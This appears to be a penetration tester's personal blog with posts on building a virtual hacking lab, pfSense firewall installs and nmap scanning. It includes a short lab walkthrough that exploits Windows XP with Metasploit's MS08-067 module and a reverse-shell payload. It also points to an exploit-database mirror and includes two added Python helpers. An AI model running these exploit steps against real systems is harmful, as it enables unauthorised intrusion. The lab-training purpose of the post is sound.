h@ckr@ck For The Win !!!

Building new Hacking LAB,

going to use my *new* HP Proliant N36L Microserver

 

At A Glance –>

  • Processor:
    • AMD Athlon™ II NEO N36L
    • AMD RS785E/SB820M chipset
  • Memory:
    • Two (2) DIMM slots
    • 1GB (1x1GB) Standard/8GB Maximum, using PC3-10600E DDR3 Unbuffered (UDIMM) ECC memory, operating at max. 800MHz
  • Storage Controller:
    • Embedded AMD SATA controller with RAID 0, 1
    • Embedded AMD eSATA controller for connecting external storage devices via the eSATA connector in the rear of the server
  • Storage Drive Support:
    • 4 Internal HDD Support
    • Maximum internal SATA storage capacity of up to 8.0TB (4 x 2TB 3.5″ SATA drives)
  • Network Controller:
    • Embedded NC107i PCI Express Gigabit Ethernet Server Adapter
  • Expansion Slots:
    • Slot 1: PCI-Express Gen 2 x16 connector with x16 link
    • Slot 2: PCI-Express Gen 2 x1 connector with x1 Link
    • Slot 2-2: PCI-Express x4 slot for optional management card
  • USB 2.0 Ports:
    • Seven (7) USB 2.0 ports: 4 front , 2 rear, 1 internal (for tape)
  • Power Supply:
    • 150 Watts Non-Hot Plug, Non Redundant Power Supply
  • Management:
    • Optional MicroServer Remote Access Card
  • Operating System:
    • Supports Windows and Red Hat Linux
  • Form Factor:
    • Ultra Micro tower

The GOAL: to create a server where virtual machines can be created and a virtual network can be built.

I have decided to use VMware for this – VMware ESXi 4.1

This VMware vSphere Hypervisor can be downloaded here.

I had 4 x 320Gb Seagate SATA hard drives already …

Hard Drive Spec

  • Model Number: ST3320413AS
  • Interface: SATA 6Gb/s
  • Cache: 16MB
  • Capacity: 320GB

The system board has an internal USB 2.0 port. I will put a USB stick in this port, which will be used to boot and run the VMware vSphere Hypervisor.

For this I will be using a Kingston’s DataTraveler® Ultimate 3.0 G2

Speed of USB Stick

  • When plugged to a USB 3.0 system:
    • Read speed up to 100MB/s
    • Write speed up to 70MB/s
  • When plugged to a USB 2.0 system:
    • Maximum specification performance (around 30MB/s read and write)

I will be upgrading the internal memory to 8GB, for this I used Kingston ValueRam KVR1333D3N9K2/8G

There is a nice video on YouTube of how to take the system board out to upgrade the memory, that can be found here.

I then put the 4 hard drives into the trays (4 trays are supplied by default), and inserted them into the drive bays.

The system comes with a 250Gb Seagate disk by default; I will use that for something else.

In the BIOS the RAID has to be set up; you have a choice of RAID 0 and RAID 1. I will use RAID 0 (also known as a stripe set or striped volume) for performance.

Add the 4 x 320Gb drives into one RAID 0 volume; this will give you 1.2Tb usable drive space.

There is a 5.25″ bay for an optical drive, but I used a USB DVD-Writer to boot the boot disk I created from the VMware ESXi 4.1 ISO image.

I then installed the VMware vSphere Hypervisor on the Kingston’s DataTraveler® Ultimate 3.0 G2 that I plugged into the internal USB port on the system board.

Remember: In the BIOS set the USB DVD-Writer to boot first.

The VMware setup starts, choose to install it to the USB Disk.

When the installation has finished, it will pick up a DHCP IP address.

Browse to the url http://hackrack/

Download the vSphere Client.

Install the client, then connect to the VMware ESXi Server.

And here is my own VMware vSphere Hypervisor to install my own Hacking Lab GOODIES…. :)

Mmmmm……

 

….

HackingDojo instructor

I have been an instructor @ The Hacking Dojo for a while now …. :)

Currently I am the instructor for the following 2 classes :  -

(1R) Mukyu (Novice) and the (1D) Shodan (Foundational)

About the Dojo

Many hacking classes provide a rapid amount of information to students, and then send them off to continue their education on their own; there is no real concern about how the students are doing after the course has finished, or how much of the course material is retained. The Hacking Dojo breaks this trend, and offers a unique method of learning how to conduct professional penetration tests through student mentoring.

The Hacking Dojo provides students with a long-term training and support system, with readily-available access to instructors. Students attend regularly-scheduled online meetings with their instructor, who teaches hacking concepts relative to students’ skill level. When the students demonstrate proficiency in a set of skills, they are moved onto more difficult challenges and instruction.

Benefits of the Hacking Dojo instruction method:

  • Live, online training sessions with the class instructor each week
  • Video tutorials on hacking, geared towards personal skill level
  • Participation in interactive student groups
  • Real-time access to instructor during non-class hours
  • Access to special tools and tutorials

easy_hack winxp sp3 with metasploit

Windows XP Service Pack 3 can easily be hacked with Metasploit Framework3.

I’m using Backtrack4-R1 as the “attacker” with IP address 192.168.1.10 and Windows XP Service Pack 3 as the “victim” with IP address 192.168.1.11.

Boot Backtrack -

Login with username “root” and password “toor”.

Assign the IP address.

Do an nmap scan with OS fingerprinting.

Start metasploit.

Use the exploit windows/smb/ms08_067_netapi

Set the payload windows/shell/reverse_tcp

Show the options.

set RHOST=192.168.1.11

set LHOST=192.168.1.10

then run “exploit”

we are in!!!

run a command to confirm.

!!!HACKED!!!

Cain & Abel v4.9.39 updated

Cain & Abel is a password recovery tool for Microsoft Operating Systems. It allows easy recovery of various kinds of passwords by sniffing the network, cracking encrypted passwords using Dictionary, Brute-Force and Cryptanalysis attacks, recording VoIP conversations, decoding scrambled passwords, recovering wireless network keys, revealing password boxes, uncovering cached passwords and analyzing routing protocols.

This is the updated change log:
Added Proxy support for Cain’s Certificate Collector.
Added the ability to specify custom proxy authentication credentials for Certificate Collector.
Added ProxyHTTPS Man-in-the-Middle Sniffer (TCP port 8080).
HTTP, APR-HTTPS and APR-ProxyHTTPS sniffer filters are now separated.
OpenSSL library upgrade to version 0.9.8q.
Winpcap library upgrade to version 4.1.2.

Download Cain & Abel v4.9.39

Milw0rm moved to new domain 1337day.com

Milw0rm (also called milwOrm) is a group of “hacktivists”, now back with the new domain 1337day.com

It’s the Inj3ct0r 1337 Team exploits and 0day exploits database site. Mirror: http://77.120.120.218/

my_pfsense

Step 1: Get an ALIX 6E1

link to Netgate’s ALIX 6E1.

I got my firewall yesterday….mmmmmm. :)

It was $175,00 from Netgate. This converts to plus minus ZAR 1 226,00.

With shipping, it came to $306.46 (I used FedEx International Priority – $131.46).

This converts to about ZAR 2 147,00.

The kit includes:

* ALIX.6E1 system board (2/1/1/256/LX800)
* Laser etched red aluminum enclosure with USB and antenna cutouts
* Blank 2 GB Sandisk Ultra II CF Card
* 15V 1.25A 18W power supply (US 3 prong plug style)

The system board looks like this -

The SPEC’s -
CPU: 500 MHz AMD Geode LX800
DRAM: 256 MB DDR DRAM
Storage: CompactFlash socket
Power: DC jack or passive POE, min. 7V to max. 20V
Three front panel LEDs, pushbutton
Expansion: 1 miniPCI slot, 1 miniPCI Express slot (USB only), LPC bus
Connectivity: 2 Ethernet channels (Via VT6105M 10/100)
I/O: DB9 serial port, dual USB port
Board size: 6 x 6″ (152.4 x 152.4 mm)
Firmware: tinyBIOS

NOTE: In South Africa you will need a converter for the power plug – USA to South Africa (2 or 3 point plug). I got one from a luggage shop for R75,00. The power supply will be fine: if you look on the bottom and it says “100-240V, 50/60 Hz”, it will work anywhere in the world with the right plugs.

NOTE: You need a Compact Flash card writer for installing the pfSense operating system, I had a 6-in-1 card reader that I got a while back.

Second Step: Download the necessary packages

They needed the embedded version specifically created for the 2 GB CF card size. The embedded version performs only reads from the flash card, with read/write file systems as RAM disks as compact flash cannot handle many write operations. The embedded versions can be found on pfSense’s mirror list.

I downloaded the 2 files – pfSense-1.2.3-RELEASE-2g-nanobsd.img.gz and pfSense-1.2.3-RELEASE-2g-nanobsd.img.gz.md5. This is the 2 GB embedded image for the 2 GB Sandisk Ultra II CF Card that I got in the ALIX.6E1 kit.

NOTE: It’s important to always download the MD5 file as well, and then to check the download against it, to make sure the image has not been tampered with. There are various tools to do this for you; a very easy one is ExactFile, which runs on Windows and is free. It can be downloaded here.

Install ExactFile and check the downloaded file for its MD5 hash. Open the MD5 file that you downloaded in a text editor and compare the hashes to see if they match.
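The same check can be scripted instead of compared by eye. This Python example is added here and is not part of the original post; it assumes the .md5 file uses one of the two common layouts (BSD `MD5 (name) = hash` or GNU `hash  name`), and the demo runs on small constructed stand-in files rather than the real image.

```python
import hashlib
import hmac
import re
import tempfile
from pathlib import Path

# BSD md5(1) style:  MD5 (name) = <hex>     GNU md5sum style:  <hex>  name
BSD_LINE = re.compile(r"^([A-Za-z0-9]+) \((.+)\) = ([0-9a-fA-F]+)$")
GNU_LINE = re.compile(r"^([0-9a-fA-F]{32,128}) [ *](.+)$")
ALGO_BY_HEX_LENGTH = {32: "md5", 40: "sha1", 64: "sha256", 128: "sha512"}


def parse_checksum_line(line):
    """Return (algorithm or None, file name, lowercase hex digest)."""
    line = line.strip()
    m = BSD_LINE.match(line)
    if m:
        return m.group(1).lower(), m.group(2), m.group(3).lower()
    m = GNU_LINE.match(line)
    if m:
        return None, m.group(2), m.group(1).lower()
    raise ValueError(f"unrecognised checksum line: {line!r}")


def file_digest(path, algo, chunk_size=1 << 20):
    """Hash the file in chunks so a 2 GB image never sits in memory."""
    h = hashlib.new(algo)
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(chunk_size), b""):
            h.update(chunk)
    return h.hexdigest()


def verify(image_path, checksum_path):
    """Return (matches, expected, actual) for the entry naming image_path."""
    image = Path(image_path)
    for raw in Path(checksum_path).read_text(encoding="utf-8").splitlines():
        if not raw.strip():
            continue
        algo, name, expected = parse_checksum_line(raw)
        if Path(name).name != image.name:
            continue  # entry for a different file
        algo = algo or ALGO_BY_HEX_LENGTH.get(len(expected))
        if algo is None:
            raise ValueError(f"cannot infer algorithm from {len(expected)} hex chars")
        actual = file_digest(image, algo)
        return hmac.compare_digest(actual, expected), expected, actual
    raise LookupError(f"{checksum_path} has no entry for {image.name}")


def demo():
    """Constructed stand-in files: a good download, then a corrupted one."""
    with tempfile.TemporaryDirectory() as tmp:
        image = Path(tmp, "pfSense-1.2.3-RELEASE-2g-nanobsd.img.gz")
        image.write_bytes(b"constructed sample image bytes\n" * 4096)
        good = hashlib.md5(image.read_bytes()).hexdigest()
        md5_file = Path(tmp, image.name + ".md5")
        md5_file.write_text(f"MD5 ({image.name}) = {good}\n", encoding="utf-8")
        intact = verify(image, md5_file)[0]
        with open(image, "r+b") as fh:      # flip one byte, as a bad transfer would
            fh.seek(100)
            fh.write(b"\x00")
        corrupted = verify(image, md5_file)[0]
    return intact, corrupted


if __name__ == "__main__":
    print(demo())   # (True, False)
```

A checksum file fetched from the same mirror as the image catches a corrupted or truncated download; it cannot by itself show that the copy on the mirror was not altered, so compare against a hash published through a separate channel when one is available.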

You will also need to download physdiskwrite. This is a small Windows NT/2000/XP command line tool that makes it possible to write disk images onto raw disks, like CF cards.

Special considerations for Windows Vista/7
physdiskwrite works with Vista/7, but you must make sure to run it as administrator (simply having admin rights isn’t enough), or it won’t find any disks. One way to do this is to create a shortcut to cmd.exe, then right-click it and select “run as administrator”. Then you can launch physdiskwrite from the command prompt window that appears, and it should work fine.

NOTE: If you get write errors shortly after physdiskwrite has begun writing to the target disk (usually after 65536 bytes), this may be caused by existing partitions on the disk. Use the Disk Management utility (right-click on the “Computer” icon on the desktop and select Manage, then navigate to Computer Management (Local)/Storage) to delete all partitions on the target disk before starting physdiskwrite.

If you are unable to delete all the partitions with the Disk Management utility, try the following procedure:

1. Open a command window as admin (“cmd”)
2. Type “diskpart” and hit enter.
3. Type “list disk” and hit enter to find out the number of your drive.
4. Type “select disk X” (where you replace X with the number of your drive) and hit enter.
5. Type “clean” and hit enter.

Third Step: Install the pfSense operating system on my CF card

pfSense’s documentation does a good job. In there it states -
Before you begin with pfSense 1.2.3 NanoBSD images, you might want to check out the following articles:
1. NanoBSD on WRAP
2. ALIX BIOS Update Procedure

To install the pfSense operating system, I used the physdiskwrite method.

C:\>physdiskwrite.exe pfSense-1.2.3-2g-20091207-1914-nanobsd.img

physdiskwrite v0.5.2 by Manuel Kasper 

Searching for physical drives...

Information for \\.\PhysicalDrive0:
   Windows:       cyl: 91804
                  tpc: 224
                  spt: 19
   C/H/S:         16383/16/63
   Model:         ST3200822AS
   Serial number:             3LJ39Y8V
   Firmware rev.: 3.01

Information for \\.\PhysicalDrive1:
   Windows:       cyl: 243
                  tpc: 255
                  spt: 63

Information for \\.\PhysicalDrive2:
DeviceIoControl() failed on \\.\PhysicalDrive2.

Information for \\.\PhysicalDrive3:
DeviceIoControl() failed on \\.\PhysicalDrive3.

Information for \\.\PhysicalDrive4:
DeviceIoControl() failed on \\.\PhysicalDrive4.

Which disk do you want to write? (0..1) 1
About to overwrite the contents of disk 1 with new data. Proceed? (y/n) y
2000158720/2001194496 bytes writtenWrite error after 2000158720 bytes.

C:\>

Fourth Step: Find a desktop PC for a serial connection to the Alix

Check the bootup process there by using a null modem cable and a terminal program. You’ll need either a USB to serial converter cable or a desktop PC to connect the serial cable. I used PuTTYtel, but you can use any program.

Fifth Step: Boot up the device and fire up PuTTYtel on my Windows system

In PuTTYtel go to Category -> Connection -> Serial


Use the following settings for the connection:
* Baud rate: 9600
* Data: 8 bit
* Stop: 1 bit
* Parity: None
* Flow control: None

Go to Category -> Session, choose Serial and click Open, then power on the device.


It goes through the boot process, and ends like this.

pfSense is by default assigned an ip of 192.168.1.1. Open your browser and navigate to http://192.168.1.1.


If you choose to login the username is ‘admin’ and the password is ‘pfsense’.

Completely Installed…

nmap is your FRIEND…. :)

nmap is the tool any Penetration Tester/ Ethical Hacker can’t do without.

The tool can be downloaded from – http://nmap.org

I will use scanme.nmap.org as the target system for the demonstration:

[root@byte ~]# ping -c 3 scanme.nmap.org
PING scanme.nmap.org (64.13.134.52): 56 data bytes
64 bytes from 64.13.134.52: icmp_seq=0 ttl=54 time=162.937 ms
64 bytes from 64.13.134.52: icmp_seq=1 ttl=54 time=158.487 ms
64 bytes from 64.13.134.52: icmp_seq=2 ttl=54 time=154.497 ms

--- scanme.nmap.org ping statistics ---
3 packets transmitted, 3 packets received, 0.0% packet loss
round-trip min/avg/max/stddev = 154.497/158.640/162.937/3.447 ms

When we run the nmap command against scanme.nmap.org:

[root@byte ~]# nmap scanme.nmap.org

Starting Nmap 5.00 ( http://nmap.org ) at 2011-01-14 06:13 CST
Interesting ports on scanme.nmap.org (64.13.134.52):
Not shown: 993 filtered ports
PORT      STATE  SERVICE
22/tcp    open   ssh
25/tcp    closed smtp
53/tcp    open   domain
70/tcp    closed gopher
80/tcp    open   http
113/tcp   closed auth
31337/tcp closed Elite

Nmap done: 1 IP address (1 host up) scanned in 34.15 seconds
[root@byte ~]#

The scan it runs by default is the TCP SYN Scan, also known as the Stealth or Half Scan. As you can see, it gives you a list of interesting ports, with a state and a service that might be running on each port.

I normally start with a host discovery with a ping scan, this goes no further than to determine if the host is online.

[root@byte ~]# nmap -sP scanme.nmap.org

Starting Nmap 5.00 ( http://nmap.org ) at 2011-01-14 06:28 CST
Host scanme.nmap.org (64.13.134.52) is up (0.16s latency).
Nmap done: 1 IP address (1 host up) scanned in 0.62 seconds
[root@byte ~]#

You can run a list scan, but this only gives you a list of targets to scan.

[root@byte ~]# nmap -sL scanme.nmap.org

Starting Nmap 5.00 ( http://nmap.org ) at 2011-01-14 06:28 CST
Host scanme.nmap.org (64.13.134.52) not scanned
Nmap done: 1 IP address (0 hosts up) scanned in 0.24 seconds
[root@byte ~]#

This scan will probably only be used to determine what the network range that you want to scan involves… something like…

[root@byte ~]# nmap -sL 64.13.134.48/28

Starting Nmap 5.00 ( http://nmap.org ) at 2011-01-14 06:35 CST
Host nmap.org (64.13.134.48) not scanned
Host insecure.org (64.13.134.49) not scanned
Host seclists.org (64.13.134.50) not scanned
Host sectools.org (64.13.134.51) not scanned
Host scanme.nmap.org (64.13.134.52) not scanned
Host research.nmap.org (64.13.134.53) not scanned
Host cust-134-54.titan.net (64.13.134.54) not scanned
Host cust-134-55.titan.net (64.13.134.55) not scanned
Host cust-134-56.titan.net (64.13.134.56) not scanned
Host cust-134-57.titan.net (64.13.134.57) not scanned
Host ns1.titan.net (64.13.134.58) not scanned
Host ns2.titan.net (64.13.134.59) not scanned
Host wwwr.titan.net (64.13.134.60) not scanned
Host nswc1.titan.net (64.13.134.61) not scanned
Host nswc2.titan.net (64.13.134.62) not scanned
Host 64.13.134.63 not scanned
Nmap done: 16 IP addresses (0 hosts up) scanned in 0.21 seconds
[root@byte ~]#

As you can see, no scanning, just listing.

I upgraded my nmap version to nmap-5.36.t4; there are other interesting things that come with this, like NPING and NCAT (Ncat was written for the Nmap Project as a much-improved reimplementation of the venerable Netcat).

But I will blog about that a bit later….

I decided, rather than going through the NMAP reference guide, I wanted to show you some nicer things to do with NMAP…well at least I think it’s nicer :)

TCP connect scan (-sT)

This is your typical 3-way handshake (SYN–>SYN-ACK–>ACK). The host sends out a SYN packet, the target responds with a SYN-ACK packet, and the host then responds with an ACK packet. Then the communications channel is established and traffic can flow.

[root@byte ~]# nmap -sT scanme.nmap.com

Starting Nmap 5.36TEST4 ( http://nmap.org ) at 2011-01-28 05:02 CST
Nmap scan report for scanme.nmap.com (64.13.134.52)
Host is up (0.045s latency).
rDNS record for 64.13.134.52: scanme.nmap.org
Not shown: 993 filtered ports
PORT      STATE  SERVICE
22/tcp    open   ssh
25/tcp    closed smtp
53/tcp    open   domain
70/tcp    closed gopher
80/tcp    open   http
113/tcp   closed auth
31337/tcp closed Elite

Nmap done: 1 IP address (1 host up) scanned in 41.77 seconds
[root@byte ~]#


Ok, you see a couple of ports open.

An interesting thing to use is --packet-trace. The --packet-trace option causes Nmap to print a summary of every packet it sends and receives. This is helpful when trying to understand how Nmap works, and for debugging.

Let’s take ssh as an example:

[root@byte ~]# nmap --packet-trace -p 22 -sT scanme.nmap.org

Starting Nmap 5.36TEST4 ( http://nmap.org ) at 2011-01-28 05:26 CST
SENT (0.0550s) ICMP 72.200.200.200 > 64.13.134.52 Echo request (type=8/code=0) ttl=58 id=45864 iplen=28
SENT (0.0550s) TCP 72.200.200.200:47740 > 64.13.134.52:443 S ttl=59 id=2266 iplen=44  seq=768689839 win=4096 
SENT (0.0550s) TCP 72.200.200.200:47740 > 64.13.134.52:80 A ttl=51 id=50330 iplen=40  seq=0 win=4096
SENT (0.0550s) ICMP 72.200.200.200 > 64.13.134.52 Timestamp request (type=13/code=0) ttl=45 id=35095 iplen=40
RCVD (0.0990s) ICMP 64.13.134.52 > 72.200.200.200 Echo reply (type=0/code=0) ttl=52 id=17449 iplen=28
NSOCK (0.2550s) UDP connection requested to 72.232.192.2:53 (IOD #1) EID 8
NSOCK (0.2550s) Read request from IOD #1 [72.232.192.2:53] (timeout: -1ms) EID 18
NSOCK (0.2550s) Write request for 43 bytes to IOD #1 EID 27 [72.232.192.2:53]: .............52.134.13.64.in-addr.arpa.....
NSOCK (0.2550s) Callback: CONNECT SUCCESS for EID 8 [72.232.192.2:53]
NSOCK (0.2550s) Callback: WRITE SUCCESS for EID 27 [72.232.192.2:53]
NSOCK (0.2560s) Callback: READ SUCCESS for EID 18 [72.232.192.2:53] (184 bytes)
NSOCK (0.2560s) Read request from IOD #1 [72.232.192.2:53] (timeout: -1ms) EID 34
CONN (0.2560s) TCP localhost > 64.13.134.52:22 => Operation now in progress
Nmap scan report for scanme.nmap.org (64.13.134.52)
Host is up (0.044s latency).
PORT   STATE SERVICE
22/tcp open  ssh

Nmap done: 1 IP address (1 host up) scanned in 0.30 seconds
[root@byte ~]#

NOTE: I used fake ip’s .. just in case :)

TCP stealth (half) scan (-sS)

This scan only sends out packets like this (SYN–>SYN-ACK). The host sends a SYN packet, and the target responds with a SYN-ACK packet, but the host never sends an ACK packet back to the target.

[root@byte ~]# nmap -sS scanme.nmap.org

Starting Nmap 5.36TEST4 ( http://nmap.org ) at 2011-01-28 05:18 CST
Nmap scan report for scanme.nmap.org (64.13.134.52)
Host is up (0.045s latency).
Not shown: 993 filtered ports
PORT      STATE  SERVICE
22/tcp    open   ssh
25/tcp    closed smtp
53/tcp    open   domain
70/tcp    closed gopher
80/tcp    open   http
113/tcp   closed auth
31337/tcp closed Elite

Nmap done: 1 IP address (1 host up) scanned in 14.75 seconds
[root@byte ~]#

Now let’s try this with the --packet-trace option

[root@byte ~]# nmap --packet-trace -p 22 -sS scanme.nmap.org

Starting Nmap 5.36TEST4 ( http://nmap.org ) at 2011-01-28 05:27 CST
SENT (0.0550s) ICMP 72.200.200.200 > 64.13.134.52 Echo request (type=8/code=0) ttl=58 id=64459 iplen=28
SENT (0.0550s) TCP 72.200.200.200:35214 > 64.13.134.52:443 S ttl=48 id=3099 iplen=44  seq=3743350257 win=1024 
SENT (0.0550s) TCP 72.200.200.200:35214 > 64.13.134.52:80 A ttl=40 id=33163 iplen=40  seq=0 win=1024
SENT (0.0550s) ICMP 72.200.200.200 > 64.13.134.52 Timestamp request (type=13/code=0) ttl=52 id=22089 iplen=40
RCVD (0.0990s) ICMP 64.13.134.52 > 72.200.200.200 Echo reply (type=0/code=0) ttl=52 id=17450 iplen=28
NSOCK (0.2550s) UDP connection requested to 72.232.192.2:53 (IOD #1) EID 8
NSOCK (0.2550s) Read request from IOD #1 [72.232.192.2:53] (timeout: -1ms) EID 18
NSOCK (0.2550s) Write request for 43 bytes to IOD #1 EID 27 [72.232.192.2:53]:  64.13.134.52:22 S ttl=56 id=9289 iplen=44  seq=1621599360 win=1024 
RCVD (0.3020s) TCP 64.13.134.52:22 > 72.200.200.200:35214 SA ttl=52 id=0 iplen=44  seq=2276068255 win=5840 
Nmap scan report for scanme.nmap.org (64.13.134.52)
Host is up (0.044s latency).
PORT   STATE SERVICE
22/tcp open  ssh

Nmap done: 1 IP address (1 host up) scanned in 0.46 seconds
[root@byte ~]#
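The difference between the two handshakes above is also what a defender can key on when reading captured traffic. This Python example is added here and is not part of the original post: it classifies each connection attempt as completed or half-open and labels sources that touch several ports. The packet records, the documentation-range addresses and the `min_ports` threshold are constructed assumptions.

```python
from collections import defaultdict

T = "203.0.113.5"   # constructed target; all addresses are documentation ranges
# Constructed records: (time, src, sport, dst, dport, flags), flags written the
# way --packet-trace prints them (S, SA, A, R, RA).
SAMPLE_PACKETS = [
    # 192.0.2.10 behaves like -sS: one source port, RST after each SYN-ACK
    (0.00, "192.0.2.10", 35214, T, 22, "S"),
    (0.01, "192.0.2.10", 35214, T, 25, "S"),
    (0.02, "192.0.2.10", 35214, T, 80, "S"),
    (0.03, "192.0.2.10", 35214, T, 443, "S"),     # filtered: never answered
    (0.05, T, 22, "192.0.2.10", 35214, "SA"),
    (0.06, T, 25, "192.0.2.10", 35214, "RA"),     # closed port
    (0.07, T, 80, "192.0.2.10", 35214, "SA"),
    (0.08, "192.0.2.10", 35214, T, 22, "R"),
    (0.09, "192.0.2.10", 35214, T, 80, "R"),
    # 198.51.100.7 behaves like -sT: full handshake, then teardown
    (1.00, "198.51.100.7", 47740, T, 22, "S"),
    (1.01, T, 22, "198.51.100.7", 47740, "SA"),
    (1.02, "198.51.100.7", 47740, T, 22, "A"),
    (1.03, "198.51.100.7", 47740, T, 22, "RA"),
    (1.10, "198.51.100.7", 47741, T, 25, "S"),
    (1.11, T, 25, "198.51.100.7", 47741, "RA"),
    (1.20, "198.51.100.7", 47742, T, 80, "S"),
    (1.21, T, 80, "198.51.100.7", 47742, "SA"),
    (1.22, "198.51.100.7", 47742, T, 80, "A"),
    (1.23, "198.51.100.7", 47742, T, 80, "RA"),
    # 192.0.2.99 is an ordinary client: one connection to one port
    (2.00, "192.0.2.99", 50000, T, 80, "S"),
    (2.01, T, 80, "192.0.2.99", 50000, "SA"),
    (2.02, "192.0.2.99", 50000, T, 80, "A"),
]


def classify_flows(packets):
    """Map (client, cport, server, dport) to no-reply/closed/half-open/full-connect."""
    flows = {}
    for _ts, src, sport, dst, dport, flags in sorted(packets, key=lambda p: p[0]):
        fwd, rev = (src, sport, dst, dport), (dst, dport, src, sport)
        if flags == "S" and fwd not in flows:
            flows[fwd] = "no-reply"                 # initial SYN from the client
        elif rev in flows:                          # reply from the server side
            if flags == "SA" and flows[rev] == "no-reply":
                flows[rev] = "half-open"            # open port, handshake unfinished
            elif "R" in flags and flows[rev] == "no-reply":
                flows[rev] = "closed"
        elif fwd in flows:                          # later packet from the client
            if flags == "A" and flows[fwd] == "half-open":
                flows[fwd] = "full-connect"         # third step of the handshake
            # a client RST after the SYN-ACK leaves the flow half-open
    return flows


def summarise_sources(packets, min_ports=3):
    """Report sources that probed at least min_ports distinct (host, port) pairs."""
    per_source = defaultdict(lambda: defaultdict(set))
    for (client, _cport, server, dport), state in classify_flows(packets).items():
        per_source[client][state].add((server, dport))
    report = {}
    for client, by_state in per_source.items():
        probed = set().union(*by_state.values())
        if len(probed) < min_ports:
            continue
        half, full = len(by_state["half-open"]), len(by_state["full-connect"])
        if half and not full:
            kind = "half-open (SYN) scan"
        elif full and not half:
            kind = "full-connect scan"
        else:
            kind = "undetermined"
        report[client] = {"kind": kind, "ports": len(probed),
                          "half_open": half, "full_connect": full}
    return report


if __name__ == "__main__":
    for source, entry in summarise_sources(SAMPLE_PACKETS).items():
        print(source, entry)
```

Only open ports separate the two scan types: closed and filtered ports look the same for both, which is why a source with no SYN-ACK replies at all is reported as undetermined.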

to be continued…..

pfSense – Open Source Firewall Distribution

pfSense is a free, open source customized distribution of FreeBSD tailored for use as a firewall and router. The project started in 2004 as a fork of the embedded firewall software package called m0n0wall. pfSense is focused towards full PC installations rather than the embedded hardware focus of m0n0wall.

This is one of the most powerful, yet simple software firewalls. It can stand its ground against any hardware firewall on the market, and it’s very easy to install.

Get a copy today and start playing – www.pfsense.org

It’s also available as a VMware appliance…

There are numerous tutorials available.

PaulDotCom did an awesome mini tech segment -

Installing pfSense on an Alix.6e1

The ALIX.6e1 hardware platform:

2 10/100 LAN / 1 miniPCI / 1 miniPCI Express / AMD LX800 / 256 MB / 2 USB / DB9 serial port / CF Card slot / Board size: 6 x 6

First Step: Get an ALIX 6E1

link to Netgate’s ALIX 6E1. Netgate’s ALIX 6E1 Costs $175.

The kit includes:

  • ALIX.6E1 system board (2/1/1/256/LX800)
  • Laser etched red aluminum enclosure with USB and antenna cutouts
  • Blank 2 GB Sandisk Ultra II CF Card
  • 15V 1.25A 18W power supply (US 3 prong plug style)

You will also need a Compact Flash card writer for installing the pfSense operating system. The one they used costs $10.00

Next you will need the pfSense & physdiskwrite Software, Cost: FREE!

Second Step: Download the necessary packages

They needed the embedded version specifically created for the 2GB CF card size. The embedded version performs only reads from the flash card, with read/write file systems as RAM disks as compact flash cannot handle many write operations. The embedded versions can be found on pfSense’s mirror list

Third Step: Install the pfSense operating system on our CF card

pfSense’s documentation does a good job. We used a Windows PC as all our other boxes were busy umm analyzing pr0n, so we opted for the physdiskwrite method.

WARNING: Follow the documentation’s advice and be sure you are not overwriting the wrong disk!

C:\Documents and Settings\All Users\Documents>physdiskwrite.exe pfSense-1.2.3-2g-20091207-1914-nanobsd.img

physdiskwrite v0.5.2 by Manuel Kasper <mk@neon1.net>

Searching for physical drives...

Information for \\.\PhysicalDrive0:
   Windows:       cyl: 19452
                  tpc: 255
                  spt: 63
   C/H/S:         16383/16/63
   Model:         ST3160812AS
   Serial number:             9LS0V1FC
   Firmware rev.: 3.ADH

Information for \\.\PhysicalDrive1:
DeviceIoControl() failed on \\.\PhysicalDrive1.

Information for \\.\PhysicalDrive2:
   Windows:       cyl: 244
                  tpc: 255
                  spt: 63

Information for \\.\PhysicalDrive3:
DeviceIoControl() failed on \\.\PhysicalDrive3.

Information for \\.\PhysicalDrive4:
DeviceIoControl() failed on \\.\PhysicalDrive4.

Which disk do you want to write? (0..2) 2
About to overwrite the contents of disk 2 with new data. Proceed? (y/n) y
2001194496/2001194496 bytes written in total

C:\Documents and Settings\All Users\Documents>

Fourth Step: Find a desktop PC for a serial connection to the Alix

You’ll need either a USB to serial converter cable or a desktop PC to connect the serial cable. In OS X I’ve used the USB to Serial cable and software called “Zterm”. You can also use the command line utility called “screen”, or several other free programs.

Fifth Step: Boot up the device and fire up Windows HyperTerminal

Use the following settings for the connection:

  • Baud rate: 9600
  • Data: 8 bit
  • Parity: None
  • Stop: 1 bit
  • Flow control: None

Now we boot into pfSense. As the bootloader comes up there are 7 options listed. The first choice you will be asked is

“Do you want to set up VLAN's now [y|n]?” Select no or 'n'.

Then you are asked to

“Enter your LAN interface name”,

We used ‘fxp1’. Next,

“Enter your WAN interface name”

We entered ‘fxp2’. Next,

“Enter the Optional 1 interface name”,

here we used ‘fxp0’.

Using the above examples, you'd see “The interfaces will be assigned as follows:”

LAN  -> fxp1
WAN  -> fxp2
OPT1 -> fxp0
Do you want to proceed [y|n]? (make sure you enter 'y' here).

pfSense is now running in RAM and almost fully functional. If you wish you may plug your LAN interface into a hub or switch and connect via the web interface. pfSense is by default assigned an ip of 192.168.1.1. Open your browser and navigate to http://192.168.1.

  • If you choose to login the username is ‘admin’ and the password is ‘pfsense’.

The original post can be found at -

Installing pfSense on an Alix.6e1 by InternMike & PaulDotCom

2011 the year of the BLOG….

My NEW YEARS resolution…BLOG dammit.

I want to frequently blog this year.

Penetration Testing/Ethical Hacking is my passion, so the topic will probably be along those lines.

Hope it’s worth the read :) .

Struggling with this blogging thing….

I am struggling to blog. I have lots of information to share, but I find it difficult to write it down…

I have been trying to become a full blown penetration tester. I have been in the IT security field for about 12 years now. I lack direction and experience…

I need a mentor, but finding one has seemed to be an impossible task.

I am very eager to get involved with the hacking community, I believe I have lots to offer, but I am not sure how to go about it.
